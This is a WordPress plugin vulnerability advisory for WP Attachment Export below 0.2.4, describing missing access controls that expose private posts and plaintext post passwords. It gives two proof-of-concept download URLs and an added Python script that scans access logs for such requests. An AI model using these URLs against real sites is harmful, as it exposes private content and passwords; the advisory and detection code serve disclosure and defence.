WordPress Plugin Vulnerabilities
WP Attachment Export < 0.2.4 - Unauthenticated Posts Download
Description
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a WordPress-powered site. This includes details of even privately published posts and password-protected posts, with their passwords revealed in plain text.
Proof of Concept
Download attachment details: http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
Download WordPress content details: http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true
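To check whether a site was queried this way, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for the export request shown above. It assumes the combined log format; the sample lines are constructed, and because an access log does not record whether a session was authenticated, each hit is a candidate for review rather than proof of exposure.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: host ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
EXPORT_PARAM = "wp-attachment-export-download"  # parameter from the proof of concept


def find_export_downloads(lines):
    """Return one finding per request that asked for the plugin's export download."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/tools.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        if EXPORT_PARAM not in query:
            continue
        content = query.get("content", [""])[0]
        findings.append({
            "host": m["host"],
            "time": m["time"],
            "scope": "attachments" if content == "attachment" else "all content",
            # 200 means a body was served; 302 is the usual redirect to the login page.
            "served": m["status"] == "200",
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
        })
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2015:10:01:02 +0000] "GET /wp-admin/tools.php?content=attachment&wp-attachment-export-download=true HTTP/1.1" 200 48211 "-" "curl/7.40"',
    '203.0.113.7 - - [15/Jul/2015:10:01:09 +0000] "GET /wp-admin/tools.php?content=&wp-attachment-export-download=true HTTP/1.1" 200 913405 "-" "curl/7.40"',
    '198.51.100.4 - - [15/Jul/2015:10:05:00 +0000] "GET /wp-admin/tools.php?page=export HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Jul/2015:08:00:00 +0000] "GET /wp-admin/tools.php?content=&wp-attachment-export-download=true HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_export_downloads(SAMPLE_LOG):
        print(finding)
```

Findings with `served` set to true and an "all content" scope deserve the closest look, since that export is the one described as containing private posts and post passwords.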
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nitin Venkatesh
Submitter
ethicalhack3r
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2015-07-15 (about 8 years ago)
Added
2015-07-15 (about 8 years ago)
Last Updated
2022-04-08 (about 2 years ago)